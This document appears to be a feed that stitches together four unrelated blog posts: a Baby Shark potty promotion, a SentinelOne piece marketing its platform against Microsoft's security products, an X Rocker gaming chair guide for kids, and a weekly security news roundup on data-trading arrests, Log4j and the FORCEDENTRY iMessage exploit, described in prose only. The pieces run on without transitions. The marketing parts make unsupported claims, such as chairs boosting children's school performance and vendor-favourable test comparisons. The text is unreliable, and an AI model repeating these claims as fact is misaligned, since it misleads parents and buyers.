The secret to the Baby Shark Potty’s success is its fun and engaging design. The image of Baby Shark supports the connection between your child and the goal of using their potty. The music is a bonus that makes the experience more fun and ensures they stay on task while using their baby shark potty.

The Baby Shark Potty is also made from durable materials that can withstand vigorous use. It is easy to clean and can be used with any standard toilet. Plus, it’s comfortable for your child to sit on, making it an excellent choice for potty training toddlers.

Together with a Baby Shark Potty, you will receive a reward chart and stickers to celebrate each victory of your child using their potty. This way, you can maintain their enthusiasm and encourage them to keep up the good work. Those who use a reward chart find a lot of success in their potty training efforts.

Baby Shark Potty is available now on Amazon. Get your child excited about using the potty with this fun and engaging potty training seat!

Baby Shark Potty – a perfect gift?

The Baby Shark Potty is a great gift to welcome your child into the world. It is a great shower or birthday gift that will bring excitement and joy into your child’s life. It can be used from toddlers to young children, which means it is an investment in their future potty training success.

The Baby Shark Potty has been reviewed on popular sites like Huffington Post, The Giggle Guide, and The Daily Dot. You can be sure that this potty training tool is one of the best methods available to help your child succeed in their potty training goals.

Baby Shark Potty Training

As funny as it might sound, the dance can bring about a breakthrough in toilet training your child. In most cases, parents find that they have to repeat the Potty Dance for months on end before their child finally gets it. Every time you perform this dance, you let your child know that he needs to go to the bathroom and that he is expected to follow suit.

The Baby Shark Potty Dance is a great place to start if you are looking for a potty training method that is both fun and effective. It is based on the Baby Shark song by Pinkfong, which has become a global phenomenon with more than 2 billion views on YouTube.

The Baby Shark Potty Dance is simple, but it gets the job done. The dance consists of three simple steps that are repeated over and over again:

  1. Sing the Baby Shark song
  2. Do the Baby Shark Dance
  3. Reward your child with a sticker, a toy, or a special treat

You need to keep this dance routine going for at least a few weeks before you see any visible results, though, so this method is not exactly a quick fix. The key is to be consistent with this routine and keep things fun for your child. If you do, then toilet training should be a breeze for everyone.

The post Baby Shark Potty – The Secret To Successful Potty Training appeared first on Comfy Bummy.

Why Your Operating System Isn’t Your Cybersecurity Friend

The primary objective in information security is to reduce the risk exposed through cyber threats towards an organization. To achieve that, security leaders aim to make informed decisions that allow their organization to best protect, detect, respond, and recover from cyber threats. Therefore, when looking into reducing risk, security leaders often choose to reduce significant dependencies in their enterprise architecture and procedures towards a particular vendor or capability.

That strategy makes good sense, but what about when you are considering security software? Some believe that OS vendor-supplied security software must be “safer” or less risky than that of 3rd party vendors. After all, this line of thinking goes, who knows the OS better than those who developed it?

Yet choosing security software sold by your operating system vendor increases your dependency on a single vendor, and in some of the most security-critical areas, too. In this post, we’ll review the pros and cons of relying on your OS vendor for security software, and we’ll take a look at what 3rd party vendors offer that an OS vendor cannot.

Security and Operating Systems | Expertise Matters

It goes without saying that the developer of any software knows that software best – they are after all, the owners of the source code – but we are where we are in cybersecurity in no small part because developers frequently fail to understand the security implications of their own products.

Responsible software companies implement bug bounty programs to invite external security specialists to audit their software, and this is no less true of OS vendors like Microsoft, Google, Apple and Red Hat Linux as it is of developers of browsers, and indeed, security software vendors, too. The more complex a piece of software, the more likely there are to be vulnerabilities, a fact borne out by recent CVE statistics in Microsoft Windows, for example.

  • In 2020, Microsoft confirmed 1,220 new vulnerabilities impacting their products, a 60% increase on the previous year.
  • 807 of 1,220 vulnerabilities were associated with Windows 10, with 107 of those related to code execution, 105 to overflows, 99 to gaining information, and 74 to gain privileges.
  • In 2021, 836 new vulnerabilities have been confirmed so far, 455 of which impact Windows 10 and 107 allow malicious code execution.
While this data refers to the most recent vulnerabilities, it’s also important to understand that many old vulnerabilities are still actively exploited by threat actors.

Operating system software is, and always will be, riddled with security vulnerabilities. Across Microsoft products, it is the Windows operating system where most security bugs are being found. Additionally, Microsoft has the highest rate of zero days compared to any other operating system vendor. Even more alarming is that most of these vulnerabilities relate to elevation of privilege or remote code execution: high risk vulnerabilities that threat actors can and do use to compromise organizations.

When a vendor is dealing with such an overwhelming amount of CVEs affecting so many different product lines, increasing your dependency on more products from that vendor requires a moment’s thought.

How much time and effort can the OS vendor extend to ensuring vulnerabilities in their security software offering are found and dealt with in a timely manner? A 3rd party vendor with a much smaller portfolio and expertise in security itself may be much-better placed to provide a reliable and effective security solution than an OS vendor with other priorities.

Moreover, with such a huge code base containing potentially vulnerable code, code dependencies in OS vendor products can present attackers with unexpected opportunities. For example, in 2021 SentinelLabs discovered a simple privilege escalation bug in Windows Defender that had been in the code since 2009.

CVE-2021-24092: 12 Years in Hiding
A Privilege Escalation Vulnerability in Windows Defender

As we have seen, just because an OS vendor knows their own product better than anyone else, it doesn’t follow that they are best placed to understand or even deal with the security implications of that software. And the bigger and more complex the software, the more true that is going to be.

When you add all this together, it raises a troubling thought: is the vendor that is likely the source of the most vulnerabilities in your environment really the vendor you want to select for cybersecurity?

Nonetheless, perhaps there is another good argument for preferring security software from an OS vendor rather than a dedicated security solutions specialist: If one were looking for a turnkey solution, perhaps the OS vendor’s own security offering should be less hassle than installing a security solution from a third party vendor?

There are a number of issues to consider here; installation, licensing, cost, ease-of-use, integration, and, ultimately, the effectiveness of the protection.

E5 Licensing Complexities | What’s Not Included In The Box

Among the major OS vendors, Microsoft is unique in having chosen to develop and sell a product to protect its own operating system software. Arguably, there is a conflict of interest in a software company looking to build revenue by marketing a security product to protect its other products, and potential customers might wonder whether the engineering effort expended there would have been better spent on directly securing those products.

Even if organizations choose to pay the premium and procure Microsoft 365 E5 Security, Enterprise Mobility and Security E5, or Windows E5 licenses, they often discover after the fact that they end up requiring additional 3rd-party products to cover the gaps of Microsoft’s security portfolio:

  • When it comes to Extended Detection Response (XDR) solutions, the general consensus in the industry is that a solution must be able to perform 3rd-party data ingestion to perform cross-workload data analytics and response actions. Microsoft 365 Defender lacks the ability for 3rd-party data ingestion, so organizations are left with a technology that can only process its own dataset and therefore only protect the limited scope of Microsoft solutions.
  • Microsoft’s Endpoint Platform Protection (EPP) and Endpoint Detection Response (EDR) offering is called Microsoft Defender for Endpoint. The solution continues to lack in several critical areas including detection quality, automatic remediation of cyber threats on non-Windows 10 endpoints, and 1-click recovery from cyber threats.

Many customers evaluating Microsoft alongside SentinelOne consistently say that the “With E5 you have everything you need” claim of Microsoft turned out to be inaccurate. Once they began their evaluations, the gaps became significant, and over time compounded by the fact that Microsoft tends to introduce additional niche products.

For example, Microsoft recently made the decision not to support Kubernetes clusters and containers with Microsoft Defender for Endpoint; instead, they announced Microsoft Defender for Containers, yet another product which is not included in E5 and which again requires additional licenses, procurement, and deployment.

Beyond that, the procurement process can quickly become very complex as all the different products are spread across dozens of different licensing models in Microsoft Azure, Microsoft Windows, and Microsoft 365.

Some of these licensing models are per endpoint, others per user, and still others are pay-as-you-go. This plethora of offerings can make it extremely difficult to predict the actual cost of the platform for a business with multiple, complex needs.

In contrast, a solution like the Singularity platform has a very simple, straightforward licensing model where customers can choose between:

  • Singularity Core – On-device, NGAV with autonomous behavioral AI that does not rely on the cloud to detect, prevent and remediate file-based and fileless attacks, including ransomware.
  • Singularity Control – Singularity Core with additional endpoint control capabilities like firewall, device control, and more.
  • Singularity Complete – Singularity Control with additional Endpoint Detection Response (EDR), Cloud Workload Security, and Network Security capabilities.

All three options are licensed in a subscription model per agent/month, with no hidden costs.

Ease of Use and Integration

It’s a natural and expected consequence of using software from one vendor that, where they have other offerings, they will try to encourage take up of their other products. But one of the most important things for an enterprise when choosing security software is how it can reduce risk, decrease dependencies, and easily integrate with the rest of the security stack.

With Singularity XDR, organizations are able to gain unified visibility across their technology ecosystem, and benefit from unparalleled data analytics with centralized cross-workload response actions.

With this approach, SentinelOne customers have the flexibility they need in order to choose a best-of-breed strategy while being able to centralize into a unified security platform.

In contrast, Microsoft’s methodology pushes organizations into a closed ecosystem, which means increasing the dependency to a single vendor that can quickly become a single point of failure.

The Ultimate Test: Who Protects Best?

Every vendor will tell you they are better than the competition, and it’s vital for security leaders to look at independent 3rd-party evaluation like when comparing security products.

The most recent MITRE Engenuity ATT&CK Evaluation is a good place to start.

Despite the fact that the simulation took place predominantly on Windows, Microsoft’s own security product still had 23 missed detections. During the test, they paused the evaluation 35 times to perform configuration changes, including for their detection logics: a luxury an organization does not have in the real-world during a cyber-attack.

In comparison, SentinelOne had zero misses, zero configuration changes, and 100% visibility.

Taking Advantage of a Best-of-Breed Approach

Security leaders aware of the pitfalls we’ve mentioned above are choosing a best-of-breed approach and bringing in security-first vendors to partner with for their security requirements.

With Singularity, SentinelOne provides a best-in-class Extended Detection Response (XDR) platform that extends protection from the endpoint to beyond with visibility, proven protection, and unparalleled response:

  • One security console: Built for centralized & intuitive operations. Whether SOC analysts are chasing bad actors or security administrators need to configure device control policies, all can be achieved in one console.
  • Best-in-class EPP + EDR for modern threats: Every endpoint is equipped to prevent and detect with robust static & behavioral AI, even when offline.
  • Consistency: SentinelOne provides you consistency in terms of what features are available and ensures feature parity across Windows, macOS, and Linux.
  • Time-saving automation: Automatic attack reconstruction with Storyline™ technology, autonomous & 1-click remediation and patented rollback, dedicated in-house experts for MDR, DFIR, and threat hunting
SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful analytics, and automated response across your complete technology stack.

Conclusion

Cybersecurity is all about managing risk as effectively as possible. There is no organization in the world that is immune to cyber threats. Over the years, security leaders have been required to make a choice between best-of-suite or best-of-breed approaches for their technology stack.

With the increasing complexity of cyber threats, the continuous increase of cyberattacks, and the increased dependency on operating system vendors, organizations are looking to partner with security-first companies that can provide a holistic approach to security.

If you would like to learn more about how SentinelOne can reduce cyber risk across your entire organization – Windows, Linux, macOS, IoT, mobile and cloud workloads – contact us or request a free demo.

X Rocker Gaming Chairs For Kids – Are They Worth A Buy?

If you’re on the hunt for a gaming chair for your little one, there are a few things you should consider before making your purchase. X Rocker Gaming Chairs have become quite popular in recent years, but are they worth the investment?
Many kids dream of having the coolest gaming chair – and X Rocker Gaming Chairs are undoubtedly high on that list. But are they worth the money?

Why do kids need a gaming chair?

As you know, kids can spend hours playing video games. Unfortunately, they spend most of that time seated, leading to all kinds of posture problems.

A gaming chair is a perfect way to prevent these problems, as it keeps the spine in a neutral position. This is essential for growing bodies, as it helps them develop properly.

There are several models of gaming chairs for kids, but they all have one thing in common: they support your back and neck, so you can enjoy playing games without feeling any discomfort.

But it’s not just about offering comfort. A gaming chair is also one of the best ways to improve your performance when playing video games. You can lean back in this chair or lift your feet and place them on the rests without any problem – all while you’re focused on winning!

Why are X Rocker Gaming Chairs so popular?

X Rocker Gaming is a company that specializes in gaming accessories, such as wireless headphones and chairs for playing video games. They offer products that anyone can use- from professional gamers to casual players – and even children.

One of the reasons why their gaming chairs are so popular is that they come with many features. For example, the X Rocker Gaming Chair for Kids has built-in speakers that will immerse your child in the game. It also has a comfortable headrest and backrest to ensure your child stays seated for hours on end.

Another popular feature is the fact that most of these chairs are wireless. This means that you don’t have to worry about getting tangled in cables while you’re trying to concentrate on the game.

It is, therefore, no wonder that many parents are looking for X Rocker Gaming Chairs For Kids to help them play video games in the best possible conditions.

The X Rocker Gaming chairs are designed to be comfortable and improve your gaming experience. And, because they’re so popular, you can find a variety of models and designs to choose from.

What should you look for when buying an X Rocker Gaming Chair?

When looking for an X Rocker Gaming Chair, you should keep a few things in mind. As we mentioned before, these chairs are designed for comfort and to improve your playtime – so you should look for one that has all of the features you need.

Some of the features you should consider before buying include:

  • Number and positioning of speakers. The more speakers your chair has, the better it will sound – which is essential for immersing yourself in the game.
  • Comfort. You should check to make sure that the seat is comfortable enough to sit on for hours at a time and that it has excellent lumbar support.
  • Wireless technology. This is a must-have feature, as it will keep you from getting tangled in cables.
  • Style and design. You should choose a chair that matches your personality and gaming style.

On top of the features mentioned above, there are a few more things to think of since the gaming chair is for kids.

  • The chair should be lightweight, so your child can move it with ease after playing and prevent injuries when they pick it up.
  • The armrests should be adjustable because their size will change as time passes (and as your child grows).
  • You should make sure that the chair is easy to clean in case of any spills.
  • The chair should also have a warranty if something goes wrong with it.
  • The most important thing you should consider when buying an X Rocker Gaming Chair for your child is that the chair will fit them. It doesn’t matter how good the chair is – if it’s too small or too big, your child won’t be able to use it for as long as they should.

When looking for an X Rocker Gaming Chair, keep all of these factors in mind to ensure you’re getting the best possible product for your needs. And don’t forget to take into account your child’s specifics – their favorite color, for example.

The best X Rocker Gaming Chairs – the guide

In this guide, we’ll be talking about the different options you have when it comes to X Rocker Gaming Chairs For Kids. You will be able to compare the different models and prices, to make a wise choice when purchasing one of these chairs.

Floor Rocker Gaming Chairs

Floor gaming chairs are a great choice because they will keep your kids off the ground and offer a comfortable gaming experience.

These chairs are designed to be used while sitting on the floor – which offers a low-profile design and lots of stability.
Some of the best X Rocker Floor Gaming Chairs include:

X Rocker Surge Floor Gaming Chair

The X Rocker Surge is an excellent chair for both kids and adults. With its powerful subwoofer and two front-facing speakers, you’ll get exceptional sound and a slight rumble, emphasizing your game, movie, or music. You can play audio from any Bluetooth-enabled device wirelessly through the chair.

X Rocker Surge includes a cushioned backrest and arms for maximum comfort when gaming. The chair is covered in durable black vinyl and has a weight capacity of 275 pounds.

The audio control is located on the side of the chair and includes easy access volume, bass, and vibration controls. X Rocker Surge comes with a wireless receiver that you can plug into any RCA output jack on your TV or stereo system, making it great for gaming on your home theater system. The chair also folds up for easy storage and transport.

Dimensions: 36.81″D x 32.28″W x 20.89″H

X Rocker II SE Floor Gaming Chair

The X Rocker II SE is a comfortable and stylish gaming chair that’s great for playing video games, watching movies, or listening to your favorite tunes.

You can play your favorite games without being tangled up in cables with wireless audio. This chair has wireless audio transmission, two speakers near the headrest, and a subwoofer positioned to pound your back with bass-heavy sounds that will enhance your game, movie, or music.

Plug your headphones into the headphone jack and adjust the bass and volume control on the side jack to your liking. The Rocker II SE connects to Xbox, PlayStation, Gameboy, MP3/CD/DVD, and home theater systems.

The chair’s upholstery is black leather-like vinyl and is easy to clean. The X Rocker II SE has a weight capacity of 275 pounds and folds for easy storage.

Dimensions: 27.8″D x 18.5″W x 17.5″H

X Rocker Eclipse Floor Gaming Chair

The X Rocker Eclipse is an excellent choice for kids who want a comfortable gaming experience. The chair has two front-facing speakers to give you an immersive audio experience while gaming.
The sleek rocker design shifts and reclines to give you more comfortable playing positions during your most extended gaming sessions. The chair is covered in durable black vinyl and has a weight capacity of 275 pounds.
The simple design of this gaming chair will fit in any room. The stylish black and silver design complements your home, game room, bedroom, or dorm room with a modern feel.

Dimensions: 31″D x 27.5″W x 16.5″H

X Rocker Flash 2.0 Floor Gaming Chair

This gaming chair has an integrated 2.0 Wired Audio System with headrest-mounted speakers for enhanced immersion in video games. It’s easily connected to most gaming systems – all you have to do is connect it to your device.

The X Rocker Flash 2.0 High Tech Audio Wired Gaming Chair’s rocking design provides smooth movement and reclines for ideal gaming positions throughout your longest missions in the game. This flexible chair is suitable for living rooms, game rooms, bedrooms, dorm rooms, or your favorite gaming area. It is also great for watching movies, reading, and lounging.

Have we mentioned how easy it is to maintain? The Flash 2.0 chair is easy to clean with a simple wipe down. Fold it down for easy storage and transport.

Dimensions: 30.71″D x 16.54″W x 26.77″H

X Rocker Lux 2.0 Floor Gaming Chair

The X Rocker Lux 2.0 Bluetooth is a lightweight yet comfortable floor gaming chair for children and players of all ages.
This chair comes with a discreet headrest-mounted 2.0 Bluetooth sound system that improves your audio experience when playing games, watching films, or listening to music.

This exquisite limited edition folding floor rocker is embellished with an eSports-inspired design and features a rich black and gold faux leather covering for added comfort, as well as a sleek black frame that folds down to store.

Fully-padded arms, a high backrest, and a durable black nylon rocker base are just some of the other features contributing to this chair’s comfortable design.

Dimensions: 31.1″ D x 18.11″ W x 29.72″ H
Weight Limit: 240 lbs

X Rocker Spade Floor Gaming Chair

The X Rocker Spade 2.1 is a portable and foldable rocker chair that can handle all of your gaming requirements; the integrated audio and subwoofer system produces an incredible sound experience while playing games, listening to music, or watching movies. Deep foam padding, which is ergonomically designed and offers long-term comfort while gaming, allows extended gameplay.

The X Rocker Spade 2.1 floor chair has a durable nylon base that allows you to game with precision and accuracy. You can find an ideal position that provides the ultimate playing experience, whether you’re rocking back and forth or staying still; the Spade 2.1’s headrest design will give you access to many different positions.

The foldable and portable design allows for easy transport and storage. This chair can be stored away in a closet, under the bed, or even behind the couch, so you always have a place to sit when it comes to gaming time.

Dimensions: 29.53″D x 16.9″W x 28.15″H

X Rocker Limewire Floor Gaming Chair

The X Rocker Limewire 2.1 BT Floor Rocker is designed for both casual and professional gamers, allowing them to not only hear the game’s noises but also feel them. The game chair is made with high-tech materials, and it has a built-in 2.1 Bluetooth Audio System with headrest-mounted speakers and a subwoofer located at the back to give you the sensation that you’re in the game.

The chair is compatible with various gaming systems and wireless devices, allowing you to enjoy video games, movies, music, and more.

The adjustable armrests on the rocking design with cushioned resting supports allow you to play in several positions throughout your most prolonged gaming sessions. The modern black and green pattern fits in well with most décor styles.

Measurements: 36.2″D x 31.5″W x 20.8″H

X Rocker Pro Series H3 Floor Gaming Chair

The ultimate all-purpose gaming chair! A leather lounging game chair may be used to play video games, watch movies and TV, listen to music, read, and unwind.

Four forward-pointing speakers, audio force modulation technology, and ported power subwoofers are combined in the chair’s open area for complete immersion in your gaming, movie, or music experience.

The Pro Series H3 has extra vibration motors that sync with your music’s bass tones to deliver an even more powerful whole-body feeling that will keep you comfortable and amused for hours.

This gaming chair is compatible with all gaming consoles. It comes with a built-in amplifier for high-quality sound, speakers flanked on both sides of the chair, and controls for volume, bass, and vibration.

The X Rocker Pro Series H3 is made of durable wood and metal frame covered with padded vinyl. The weight capacity is 275 pounds.

Dimensions: 35″D x 22″W x 34.5″H

X Rocker Emerald RGB Floor Gaming Chair

This sophisticated chair has an integrated 2.0 Wired Audio System with headrest-mounted speakers and a backrest subwoofer to immerse you in the game.

The chair’s high-quality hooded design, complete with a softly curved armrest and backrest, makes it stylish and comfortable. It also has RGB LED technology built-in for lighting effects that can be modified using the touch of a button.

Although this gaming chair is not wireless, it does have a built-in headphone jack and volume control for personal listening. With a weight capacity of 250 pounds, the X Rocker Emerald RGB is great for both children and adults.

Measurements: 30.3″D x 26.4″W x 22.2″H

X Rocker Extreme III Floor Gaming Chair

The X Rocker Extreme is great for gaming, watching movies and TV shows, and listening to music. A built-in 2.1 Speaker System with a subwoofer and amplifier puts out 30 watts of sound for impactful bass and overall audio quality.

The unique, full-bodied sound system chair provides you with total media immersion and has been carefully built to boost the sound quality and enhance your experience.

The X Rocker’s speakers and its ported power subwoofers are boosted by the open area inside the X Rocker rather than simply the frame, resulting in improved sound quality.

The chair has a sturdy wood frame and is covered with durable faux leather for optimal comfort. It provides excellent support, making it great for people of all ages and sizes. The weight capacity is 275 pounds.

Dimensions: 26″D x 17.5″W x 17″H

X Rocker Pedestal Chairs

Not all want to sit that close to the floor, and that’s ok! If you are looking for a gaming chair in a more traditional form, The X Rocker Pedestal Chairs might be exactly what you’re looking for!

X Rocker Vibe Gaming Chair

With a beautiful, breathable fabric back and seat, high back tilt & swivel pedestal gaming chair may be used to play video games, watch movies, listen to music, read, and unwind. You will not want to get up!
Integrated with two 2.0 speakers and a powerful subwoofer, the X Rocker Vibe creates an experience that will keep you captivated and relaxed for hours on end.
Vibe 2.1 Bluetooth Pedestal Gaming Chair has extra vibration motors that sync with your audio’s bass tones to provide an even more powerful full-body sensation, keeping you comfortable and engaged at the same time.
The chair’s ergonomic design includes a headrest and lumbar support for additional comfort. The X Rocker Vibe can be used with all gaming consoles and has a weight capacity of 250 pounds.

Dimensions: 33.86″D x 40.55″W x 23.62″H

X Rocker Covert Gaming Chair

This chair is designed for the modern gamer. It has a sleek, low-profile design and is made of vinyl and metal. The Covert is lightweight and easy to move around, making it perfect for use at home or LAN parties.

The built-in 2.1 audio system provides high-quality sound and powerful bass. At the same time, the included wireless transmitter allows you to connect wirelessly to your game console or PC. 2 subwoofers make sure that you will feel that bass!

The unique design adjusts to your body rather than forcing you to change, providing superior comfort. Lumbar and neck support for extra comfort make it ideal for long-haul missions in the game.

Dimensions: 30.71″D x 25.19″W x 37.6″H

X Rocker Falcon Gaming Chair

The low-slung X Rocker Falcon Pedestal is as ergonomic as gaming chairs get, although it sits somewhat lower than most others on the market – therefore, it is more suitable for children.

On the other hand, the distinctive design provides maximum stability thanks to the enormous pedestal base. The use of a lumbar roll relieves pressure on the spine, allowing for more blood flow and nutrients to reach the lower back. In addition, it minimizes fatigue and soreness by extending blood flow and nutrient availability. The X Rocker Falcon is comfortable and safe for developing gamers.

How are the other technical specifications of X Rocker Falcon? The 2.1 wireless integrated sound system is one of the appealing aspects of the Falcon Pedestal Gaming Chair. There are seated speakers, and a rearrest subwoofer to make you feel like you’re actually inside the game. The whole set is mounted on a unique pedestal base with good stability and enormous surface area.

The X Rocker Falcon Pedestal offers three different sound options: Bluetooth, RCA (stereo), and headphone jacks (3.5mm). The wireless RCA or stereo jack connectivity ensures that you can connect the device to your favorite gaming console, laptop, or media player. The X Rocker Falcon Pedestal Gaming Chair is designed to work with almost every operating system available.

Dimensions: 32″D x 25″W x 42″H

X Rocker Mammoth Gaming Chair

The X Rocker Mammoth has a durable faux leather covering and an ultra-padded seat. Because of that, it is one of the most comfortable gaming chairs on the market.

In addition, it comes with a built-in 2.1 amplifier for high-quality sound, speakers on either side of the chair, and has controls for bass, volume, and vibration. With the top-of-the-line 2.1 Dual audio system, you may link to all of your favorite gaming systems, including PlayStation 4, Xbox One, and Nintendo Switch. The sound-reactive vibration motors add to your gaming experience, while an elevated pedestal base keeps you off the floor for extended periods of fun and entertainment.

The X Rocker Mammoth gaming chair is also built with solid wood and a metal frame that can hold up to 300 pounds.

Measurements: 32″D x 40.9″W x 26″H

X Rocker RGB Prism Gaming Chair

Would your child like a bit of color to the gaming equipment? The surface of X Rocker RGB Prism is illuminated by RGB LED technology and may be customized with over 30 color and pattern options that may all be altered using a touch of a button.

But looks aside, this gaming chair also offers an ergonomic design for superior comfort. The backrest is adjustable to conform to the natural curvature of your spine, and the two speakers are placed on either side to give you an immersive audio experience. The chair is made with a vinyl and metal frame designed to last, and it can hold up to 300 pounds.

The Bluetooth/Wireless technology lets you connect to any gaming device in your home, and the 3.5mm stereo jack allows you easily connect to any audio device. The chair also has an integrated control panel to adjust the sound, bass, and vibration.

The X Rocker RGB Prism gaming chair is perfect for children and adults alike, and it can be used with any gaming system.

Measurements: 33″D x 25″W x 45″H

Are X Rocker Gaming Chairs For Kids worth the investment?

X Rocker Gaming Chairs are not cheap. If you’re planning to get one for your child – or even for yourself- you’ll need to be prepared to spend a few hundred dollars on it. However, even if they seem very expensive, you should know that these chairs are built to last.

They’re not only ergonomically designed and incredibly comfortable, but also quite sturdy and very durable. This means the chair won’t tip over or break down easily.

Are X Rocker Gaming Chairs worth it, especially for kids? From our point of view, the answer is definitely “yes”! Not only do these chairs provide great comfort and improve gaming performance, but they’re also built to last. If you’re looking for a gaming chair that will make your child happy and comfortable and give them outstanding performance while playing video games, this is an excellent choice.

A fantastic video game chair can make your kid’s experience much better by enhancing their focus & improving their reaction time (allowing them to respond quickly to winning the game). A video game chair that enhances kids’ performance in school or any other activity is a “must-have” for any parent.

The post X Rocker Gaming Chairs For Kids – Are They Worth A Buy? appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 51

The Good

Great news this week as details emerged of an operation in which law enforcement arrested 51 individuals accused of illegally trading the personal data of U.S., European and Ukrainian citizens. Cyber cops in Ukraine carried out raids in which around 100 databases containing stolen personal data spanning 2020-2021 were seized.

The databases reportedly contained information on some 300 million citizens of Ukraine, Europe and the United States. Depending on their content, the databases were sold from anywhere between $18 and $1800 a time. Police said they had also shut down a large site where the data was traded and blocked 30 other channels involved in the illegal dissemination of data.

19 suspects have already been charged, with more expected to follow. Ukrainian authorities said that data theft had become increasingly attractive as the number of owners and managers of personal data in the private sector had increased. This presents new challenges as many of these entities struggled with how to prevent and contain data breaches against determined, financially-motivated hackers.

The Bad

“The internet is on fire”, it was declared earlier this week, and the inferno continues to rage in the wake of the Apache Log4j2 vulnerabilities, more formerly tracked as CVE-2021-44228 and CVE-2021-45046. Admins everywhere have been scrambling to find out how exposed they are to the critical remote code execution vulnerabilities in Apache’s Java logging library.

The first vulnerability affects Log4j2 versions 2.0 beta9 to 2.14.1. This was patched in version 2.15.0 released this week, but a second vulnerability that could allow a denial of service (DOS) attack in certain non-default configurations was subsequently discovered. That means administrators need to ensure affected products are updated to Log4j2 v2.16.0.

Infosec itself lost no time in coming up with proof-of-concept exploit code and threat actors were also quick off the mark with cryptominer payloads. In the midst of the panic, predictions of widespread nation-state actor attacks and ransomware incidents have been rife, but none so far have come to light. Expect that to change, is the message everyone should be hearing.

Windows and Linux devices are particularly at risk. macOS hasn’t shipped with Java for over a decade, but there are plenty of macOS applications that require a 3rd party JRE, including Crashplan, Ghidra, Jamf Pro and Gradle. Apple’s own Xcode 13.2 also contains a vulnerable version of log4j2, though it’s unclear at this time how that could be exploited.

Organizations are urged to discover all internet-facing assets which use Log4j and that allow data input, to update or isolate those assets, and to monitor for anomalous traffic patterns, particularly around outbound JDNI LDAP/RMI traffic and DMZ-initiated outbound connections.

The Ugly

Sometimes, you have to just sit back and admire the dedication of both attackers and defenders to come up with, and discover, novel attacks. This week, hats off to Google’s Project Zero team for reversing and describing one of those “you wouldn’t believe it if it was in a movie” exploits, a nasty, clever, almost-impossible-to-believe exploit of Apple’s iMessage format that was used to target dissidents.

The zero-click exploit, which Project Zero describes as “one of the most technically sophisticated exploits we’ve ever seen”, was developed by the ever-notorious NSO group and sold to unknown regimes around the world. It came to light after Citizen Lab caught the zero-click exploit being used to target a Saudi activist.

The attack begins with a maliciously-crafted PDF file with a .gif file extension being sent to the target. The victim need not read or even open the message; all that is required is that the device receives it. On receipt of the iMessage and fake GIF file, Core Graphics APIs are called into action to parse the file. Here’s where things get crazy.

A zero-day vulnerability (now tracked as CVE-2021-30860) in the open-source PDF parser used by Apple allowed the attackers to construct an entire emulated computer architecture inside the parser’s JBIG2 decompression stream. As explained by Google’s Ian Beer and Samuel Groß:

“Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture…the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It’s pretty incredible, and at the same time, pretty terrifying.”

The full details are well worth a read for anyone interested in just what can be done with what started, after all is said and done, from a simple integer overflow. The resulting exploit, aka FORCEDENTRY, was patched by Apple back in September and affects iOS 14.7 and earlier, all versions of macOS Big Sur prior to 11.6, and watchOS 7.6.1 and earlier.